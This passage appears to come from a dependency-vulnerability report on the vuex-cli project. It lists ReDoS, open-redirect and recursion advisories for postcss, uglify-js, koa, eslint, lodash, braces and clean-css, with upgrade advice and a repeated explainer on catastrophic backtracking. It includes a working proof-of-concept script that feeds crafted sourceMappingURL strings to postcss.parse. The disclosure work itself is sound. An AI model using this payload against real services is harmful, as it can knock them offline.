  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rebeccapurple@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgb@1.1.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgba-fallback@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-media@5.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-family-system-ui@1.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-initial@1.5.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-media-minmax@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-nesting@2.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudo-class-any-link@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudoelements@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-replace-overflow-wrap@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-not@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-js@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-simple-vars@3.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 sugarss@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-extract-imports@1.2.1 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-local-by-default@1.2.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-scope@1.1.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss-modules-values@1.3.0 postcss@6.0.23
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-image-set-polyfill@0.3.5 postcss@6.0.23

Overview

postcss is a PostCSS is a tool for transforming styles with JS plugins.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s*# sourceMappingURL=(.*).

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for(var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try{
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
            }
        catch(e){
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
        }
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade postcss to version 8.2.13, 7.0.36 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: uglify-js
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 html-minifier@3.5.21 uglify-js@3.4.10
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 uglify-js@2.8.29
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 uglify-js@2.8.29
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0 uglify-js@2.3.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-html-loader@1.2.4 html-minifier@2.1.7 uglify-js@2.6.4
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 uglify-js@2.7.5

Overview

uglify-js is a JavaScript parser, minifier, compressor and beautifier toolkit.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the string_template and the decode_template functions.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade uglify-js to version 3.14.3 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: uglify-js
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0 uglify-js@2.3.6
    Remediation: Open PR to patch uglify-js@2.3.6.

Overview

The parse() function in the uglify-js package prior to version 2.6.0 is vulnerable to regular expression denial of service (ReDoS) attacks when long inputs of certain patterns are processed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade to version 2.6.0 or greater. If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

medium severity

Open Redirect

  • Vulnerable module: koa
  • Introduced through: koa@1.7.1

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli koa@1.7.1
    Remediation: Upgrade to koa@2.16.2.

Overview

koa is a Koa web app framework

Affected versions of this package are vulnerable to Open Redirect via the back function in lib/response.js which uses the user-controllable referrer header as the redirect target. An attacker can redirect users to arbitrary external sites by manipulating the Referrer argument.

Remediation

Upgrade koa to version 2.16.2, 3.0.1 or higher.

References

medium severity

Uncontrolled Recursion

  • Vulnerable module: eslint
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3

Overview

eslint is a pluggable linting utility for JavaScript and JSX

Affected versions of this package are vulnerable to Uncontrolled Recursion in the isSerializable function when handling objects with circular references during the serialization process. An attacker can cause the application to crash or become unresponsive by supplying specially crafted input that triggers infinite recursion.

Remediation

Upgrade eslint to version 9.26.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It parses dates using regex strings, which may cause a slowdown of 2 seconds per 50k characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade lodash to version 4.17.11 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: braces
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 sane@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It used a regular expression (^\{(,+(?:(\{,+\})*),*|,*(?:(\{,+\})*),+)\}) in order to detects empty braces. This can cause an impact of about 10 seconds matching time for data 50K characters long.

Disclosure Timeline

  • Feb 15th, 2018 - Initial Disclosure to package owner
  • Feb 16th, 2018 - Initial Response from package owner
  • Feb 18th, 2018 - Fix issued
  • Feb 19th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade braces to version 2.3.1 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: clean-css
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-html-loader@1.2.4 html-minifier@2.1.7 clean-css@3.4.28

Overview

clean-css is a fast and efficient CSS optimizer for Node.js platform and any modern browser.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). attacks. This can cause an impact of about 10 seconds matching time for data 70k characters long.

Disclosure Timeline

  • Feb 15th, 2018 - Initial Disclosure to package owner
  • Feb 20th, 2018 - Initial Response from package owner
  • Mar 6th, 2018 - Fix issued
  • Mar 7th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

